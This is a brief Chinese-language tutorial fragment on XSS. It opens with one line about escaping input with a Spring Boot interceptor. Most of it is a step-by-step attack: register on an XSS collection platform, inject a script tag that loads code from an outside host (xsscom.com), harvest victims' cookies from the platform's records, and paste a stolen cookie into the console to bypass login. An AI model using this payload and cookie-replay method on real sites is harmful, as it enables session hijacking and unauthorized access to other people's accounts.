1、如何防御 在springboot中可以使用拦截器进行输入框转换 2、XSS漏洞简单测试 网站:xss注册一下 注册账号,创建项目 选择对应的 点击下一步 在指定的地方输入即可 xxxxx文本 <script src=http://xsscom.com//YdIbhc></script> 在我的项目中可以看到记录其中有cookie 打开控制台输入cookie 然后可以绕过界面登录直接访问路由地址即可